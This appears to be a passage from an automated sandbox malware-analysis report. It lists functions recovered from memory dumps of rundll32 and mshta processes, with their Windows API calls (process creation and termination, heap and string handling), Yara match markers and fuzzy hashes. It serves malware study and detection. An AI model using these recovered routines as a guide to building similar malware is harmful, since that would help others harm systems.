                              • WaitForSingleObject.KERNEL32(00000000,?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C), ref: 05944B1B
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                              • String ID:
                              • API String ID: 4211439915-0
                              • Opcode ID: 5198e4fd8b295e94128e024287c6093f66ff965d84c1650e4fa00dd9531ab501
                              • Instruction ID: 7cc2c5f42e08e645004d5b928e4191177a42b6737f72e7c9983a0f371f8f9615
                              • Opcode Fuzzy Hash: 5198e4fd8b295e94128e024287c6093f66ff965d84c1650e4fa00dd9531ab501
                              • Instruction Fuzzy Hash: C5F06D32A09320ABD6201A75AC4EF5ABE2DEF00372F124622FA0DA61D0CE214C60CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05950DDD Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,05937BEE), ref: 05950DE2
                              • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05950DF7
                              • wsprintfA.USER32 ref: 05950E13
                                • Part of subcall function 0594C01F: memset.NTDLL ref: 0594C034
                                • Part of subcall function 0594C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0594C06D
                                • Part of subcall function 0594C01F: wcstombs.NTDLL ref: 0594C077
                                • Part of subcall function 0594C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0594C0A8
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0D4
                                • Part of subcall function 0594C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0594C0EA
                                • Part of subcall function 0594C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0593A645), ref: 0594C0FE
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C131
                                • Part of subcall function 0594C01F: CloseHandle.KERNEL32(?), ref: 0594C136
                              • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05950E2F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                              • String ID:
                              • API String ID: 1624158581-0
                              • Opcode ID: d3e3ab2a4520fb20f3b9841041a0dbb976b44a6e6ae14750e0c5f13077e6a6cc
                              • Instruction ID: 32b49ea5f61f3aeb9fbf3751db434080865c9be42b7f013930dcab3d1bbd9c85
                              • Opcode Fuzzy Hash: d3e3ab2a4520fb20f3b9841041a0dbb976b44a6e6ae14750e0c5f13077e6a6cc
                              • Instruction Fuzzy Hash: AEF0B431619210BBC6205A29AC0EF6BBF6DEBC2731F160120F905D6191CF209C29CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05936537 Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 05936540
                              • Sleep.KERNEL32(0000000A), ref: 0593654A
                              • HeapFree.KERNEL32(00000000,?), ref: 05936572
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05936590
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 537f96e82a5e023341d342d10ff3be21eda546fccd7ace02741d29e324deb92e
                              • Instruction ID: 8e09355346eea44c6c74c354754d7b3543907af9f36af0c4767a0933682f57e5
                              • Opcode Fuzzy Hash: 537f96e82a5e023341d342d10ff3be21eda546fccd7ace02741d29e324deb92e
                              • Instruction Fuzzy Hash: D7F05E71218340EFE7109B38DC4BF1ABFA8EF00301F008524F64ADA152CB34E860CB19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05950B2C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 05950B35
                              • Sleep.KERNEL32(0000000A), ref: 05950B3F
                              • HeapFree.KERNEL32(00000000), ref: 05950B6D
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05950B82
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 65356abf70f228986496fdcac3bb4981c5fada98a272ee9737e93c2bd4a2d920
                              • Instruction ID: 6c561f40bdd43ccf838a58fd246daf2b80cebeb4c3677b38e77693a6a786495f
                              • Opcode Fuzzy Hash: 65356abf70f228986496fdcac3bb4981c5fada98a272ee9737e93c2bd4a2d920
                              • Instruction Fuzzy Hash: 36F0DA742683019FEB08CB24D98AF25BBA9FF04316B154108FA06CB651CB35AC70CB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05940901 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594095D
                              • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,0593C1F8,00000000), ref: 059409AB
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,05951616,00000000,0593C1F8,0594E6A0,00000000,0593C1F8,059400C3,00000000,0593C1F8,0593306D,00000000), ref: 05940CB6
                              • GetLastError.KERNEL32(?,00000000,?), ref: 05940FB8
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorFreeHandleHeapLastmemset
                              • String ID:
                              • API String ID: 2333114656-0
                              • Opcode ID: 619678180c31bbfb6a1b4f4b9cf795784c05d2cdddaaeb63b6cd5d907bcd4dad
                              • Instruction ID: 93512b3d0ebf9d33318a7dade08d3e634a7177915f09cdac45ba9290c2a4c457
                              • Opcode Fuzzy Hash: 619678180c31bbfb6a1b4f4b9cf795784c05d2cdddaaeb63b6cd5d907bcd4dad
                              • Instruction Fuzzy Hash: 7A519631648209FADF11EE64DC4DFAF7A6EBB95214F1404B1BF09AE080DB70AE519F52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593A78E Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059463D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?), ref: 059463F5
                                • Part of subcall function 059463D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05946407
                                • Part of subcall function 059463D1: wcstombs.NTDLL ref: 05946415
                                • Part of subcall function 059463D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?), ref: 05946439
                                • Part of subcall function 059463D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0594644E
                                • Part of subcall function 059463D1: mbstowcs.NTDLL ref: 0594645B
                                • Part of subcall function 059463D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 0594646D
                                • Part of subcall function 059463D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 05946487
                              • GetLastError.KERNEL32 ref: 0593A82D
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C58
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C7C
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,059317D6,?,?,?,?,?,?,?), ref: 05943C8A
                              • HeapFree.KERNEL32(00000000,?), ref: 0593A849
                              • HeapFree.KERNEL32(00000000,?), ref: 0593A85A
                              • SetLastError.KERNEL32(00000000), ref: 0593A85D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 3867366388-0
                              • Opcode ID: 461ea02727d2b060aca2671016805785d4ec9be5ce2b61db8a682e63eddd3521
                              • Instruction ID: eb70c4a7a2491e05874ba24c9f08ca355e42def6001e754e69d9788931bfeec9
                              • Opcode Fuzzy Hash: 461ea02727d2b060aca2671016805785d4ec9be5ce2b61db8a682e63eddd3521
                              • Instruction Fuzzy Hash: 90312A36904208FFCF029FA9DC45C9EBFBAFF48320B144566F916A2121D7359A61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593174F Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D6F2
                                • Part of subcall function 0594D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D710
                                • Part of subcall function 0594D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0594D73C
                                • Part of subcall function 0594D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D753
                                • Part of subcall function 0594D698: HeapFree.KERNEL32(00000000,00000000), ref: 0594D766
                                • Part of subcall function 0594D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D775
                              • GetLastError.KERNEL32 ref: 059317EE
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C58
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05943C7C
                                • Part of subcall function 05943BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,059317D6,?,?,?,?,?,?,?), ref: 05943C8A
                              • HeapFree.KERNEL32(00000000,?), ref: 0593180A
                              • HeapFree.KERNEL32(00000000,?), ref: 0593181B
                              • SetLastError.KERNEL32(00000000), ref: 0593181E
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                              • String ID:
                              • API String ID: 2451549186-0
                              • Opcode ID: 1313b4bea81882d46fefb8544ced0ec66583cddec36ac1a212812f73585a4c42
                              • Instruction ID: fc56f1f6ff189cfc9f48609013d125f5af06137074613205a0a68eb5801c3b7b
                              • Opcode Fuzzy Hash: 1313b4bea81882d46fefb8544ced0ec66583cddec36ac1a212812f73585a4c42
                              • Instruction Fuzzy Hash: 2F312936904208FFCF129FA9DC45C9EBFB9FF48320B144656F916A2121D7319A61EF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05936FC7 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: a8a076de666ad74611c3339a5196f98b86f6a881138d9d05cf8bedaaa7d176d4
                              • Instruction ID: 1b8c6ee27817442e609b5a42985c309c90464385f2ee7b6a013584a13c43e848
                              • Opcode Fuzzy Hash: a8a076de666ad74611c3339a5196f98b86f6a881138d9d05cf8bedaaa7d176d4
                              • Instruction Fuzzy Hash: D3216FB2601909FBCB219FA0DC85E6ABB69FF09300B140559E94A96C50D732F9B1CFD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D429 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000), ref: 0593D435
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                                • Part of subcall function 05952DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,0593D463,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000), ref: 05952DF1
                                • Part of subcall function 05952DE3: StrChrA.SHLWAPI(?,0000003F,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000,05933EC6,?), ref: 05952DFB
                              • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?), ref: 0593D493
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4AF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                              • String ID:
                              • API String ID: 3767559652-0
                              • Opcode ID: e5150ec9678baf92cd376e9c078689372cf95c921fa1edaa3033c02f2a117721
                              • Instruction ID: deb6042a2ef8a7ae164d050609e4100783ce84982ebe17f43fa69b1ecec1cac9
                              • Opcode Fuzzy Hash: e5150ec9678baf92cd376e9c078689372cf95c921fa1edaa3033c02f2a117721
                              • Instruction Fuzzy Hash: 28219072504355EBCF029F74CC9DAAE7FADAF452D0B058454F8099F242DB75EA1087E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945189 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                              • Instruction ID: 170eee47ba23dcd37ae39c14ae42726eadb83544742e32b58da1203fec466746
                              • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                              • Instruction Fuzzy Hash: 08119E72601919BBDB209FA0DC84E66B77CFF09300B06052AF94A92810D772B9B19FE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05948193 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(69B25F44,?,?,00000000,05945F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 059481A4
                              • lstrlen.KERNEL32(?,?,?,?), ref: 059481A9
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 059481C5
                              • lstrcpy.KERNEL32(00000000,?), ref: 059481E3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                              • String ID:
                              • API String ID: 1697500751-0
                              • Opcode ID: 067b2d3f883470a6de08a753e40f79132110dee900e0b4616a0a4eefd124dbd5
                              • Instruction ID: 88ad86deb0d0000ec62ffe6695afacbcf550b732a5e64801741ce61ba4d95eef
                              • Opcode Fuzzy Hash: 067b2d3f883470a6de08a753e40f79132110dee900e0b4616a0a4eefd124dbd5
                              • Instruction Fuzzy Hash: E4F0F6B7508B51ABD72196699C4CF5BBF9CFFC8211F090416F90983101E731E814CBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05938DC7 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(05F38560,76C85520,76CC81D0,773BEEF0,0593E873,?), ref: 05938DD7
                              • lstrlen.KERNEL32(?), ref: 05938DDF
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000,05F38560), ref: 05938DF3
                              • lstrcat.KERNEL32(00000000,?), ref: 05938DFE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 9ac9d06e520be7d5627c0486c9239cc5c017c378bf78c5ab99be14f22c82e621
                              • Instruction ID: da5df2c7f1ff4853d8e1158e87d151c4ae38a8799984aa9d18922e9c72e81db1
                              • Opcode Fuzzy Hash: 9ac9d06e520be7d5627c0486c9239cc5c017c378bf78c5ab99be14f22c82e621
                              • Instruction Fuzzy Hash: 85E09273515320AB8B119BB8AC4DC9FFFACEF896253050816F604D3111CB2099148BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              Function 0000018713CA0FB2 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000012.00000003.319380622.0000018713CA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000018713CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_3_18713ca0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                              • Instruction ID: 5606b2a02df35fa599628c0f9e4d44187078352c50f0955d2a7577aa8e4c4b7d
                              • Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                              • Instruction Fuzzy Hash: DAB0120446FBC24ED70313730C6929E3F60AB47658FD95DC78055D50D3F40C068D9322
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0000018713CA0FC1 Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000012.00000003.319380622.0000018713CA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000018713CA0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_18_3_18713ca0000_mshta.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                              • Instruction ID: 456640eb2d22197f2727c170d30a36af38ae97571cfec4d7acc93335dad8311d
                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                              • Instruction Fuzzy Hash: B490021449941655D41415910C4929D60406388694FE488804426A05C4E84D43965252
                              Uniqueness

                              Uniqueness Score: -1.00%